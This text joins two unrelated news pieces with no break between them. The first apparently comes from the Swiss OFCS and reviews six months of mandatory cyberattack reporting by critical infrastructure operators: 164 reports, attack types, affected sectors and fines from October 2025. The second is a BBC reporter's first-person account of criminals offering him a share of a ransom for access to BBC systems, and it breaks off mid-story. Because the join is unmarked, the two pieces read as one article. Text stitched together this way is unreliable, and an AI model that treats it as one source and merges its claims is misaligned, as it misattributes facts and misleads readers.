The obligation to report cyberattacks against critical infrastructure entered into force six months ago. The OFCS is broadly satisfied with how the measure has been implemented. Operators of critical infrastructure are complying with the legal deadline, which requires cyberattacks to be reported within 24 hours. The use of the Cyber Security Hub, which considerably simplifies the handling of cyberattacks by the OFCS, is a particularly positive point. Even before the reporting obligation was introduced, the relationship of trust between the OFCS and many critical infrastructure operators was already close. This long-standing collaboration between the partners laid the foundation for the successful launch of the reporting obligation.

164 reports concerning critical infrastructure
Since the beginning of April, a total of 164 reports of cyberattacks against critical infrastructure have been submitted to the OFCS. The most frequent concern DDoS attacks (18.1%), followed by hacking (16.1%), ransomware attacks (12.4%), credential theft (11.4%), data leaks (9.8%) and malware (9.3%). Combined phenomena, such as ransomware attacks with simultaneous data leaks, were described in several cases. The affected sectors are varied. So far, the most heavily impacted sector has been finance (19%), followed by IT (8.7%) and the energy sector (7.6%). Other reports came from public authorities, the healthcare sector, telecommunications companies, the postal sector, the transport sector, the media and technology industries, and the food sector.

Strengthening the exchange of information
The reports are recorded and analyzed for statistical purposes. The information obtained not only helps in responding concretely to an incident, but also contributes to a better assessment of the national threat landscape and to warning other potentially affected organizations early enough. Since the reporting obligation entered into force, many more organizations participate directly in the exchange of information, so reports and recommendations now reach significantly more actors through this channel.

Sanctions for violations as of October 1, 2025
The sanctions provided for by the Information Security Act in the event of failure to report a cyberattack enter into force on October 1, 2025. Operators of critical infrastructure can be fined up to 100,000 Swiss francs if they do not comply with this obligation. Moreover, if the OFCS has indications suggesting that a report was not made, it is required to first contact the authority concerned. Only if those concerned fail to respond to this contact and to the subsequent ruling can the OFCS file a criminal complaint.

'You'll never need to work again': Criminals offer reporter money to hack BBC

Reporter Joe Tidy was offered money if he would help cyber criminals access BBC systems.

Like many things in the shadowy world of cyber-crime, an insider threat is something very few people have experience of.

Even fewer people want to talk about it.

But I was given a unique and worrying experience of how hackers can leverage insiders when I myself was recently propositioned by a criminal gang.

"If you are interested, we can offer you 15% of any ransom payment if you give us access to your PC."

That was the message I received out of the blue from someone called Syndicate who pinged me in July on the encrypted chat app Signal.

I had no idea who this person was but instantly knew what it was about.

I was being offered a portion of a potentially large amount of money if I helped cyber criminals access BBC systems through my laptop.

They would steal data or install malicious software and hold my employer to ransom and I would secretly get a cut.

I had heard stories about this kind of thing.

In fact, only a few days before the unsolicited message, news emerged from Brazil that an IT worker there had been arrested for selling his login details to hackers, which police say led to the loss of $100m (£74m) for the victim bank.

I decided to play along with Syndicate after taking advice from a senior BBC editor. I was eager to see how criminals make these shady deals with potentially treacherous employees at a time when cyber-attacks around the world are becoming more impactful and disruptive to everyday life.

I told Syn, who had changed their name mid-conversation, that I was potentially interested but needed to know how it works.

They explained that if I gave them my login details and security code then they would hack the BBC and then extort the corporation for a ransom in bitcoin. I would be in line for a portion of that payout.

They upped their offer.

"We aren't sure how much the BBC pays you but what if you took 25% of the final negotiation as we extract 1% of the BBC's total revenue? You wouldn't need to work ever again."

Syn estimated that their team could demand a ransom in the tens of millions if they successfully infiltrated the corporation.

The BBC has not publicly taken a position on whether or not it would pay hackers, but the advice from the National Crime Agency is not to pay.

Still, the hackers continued their pitch.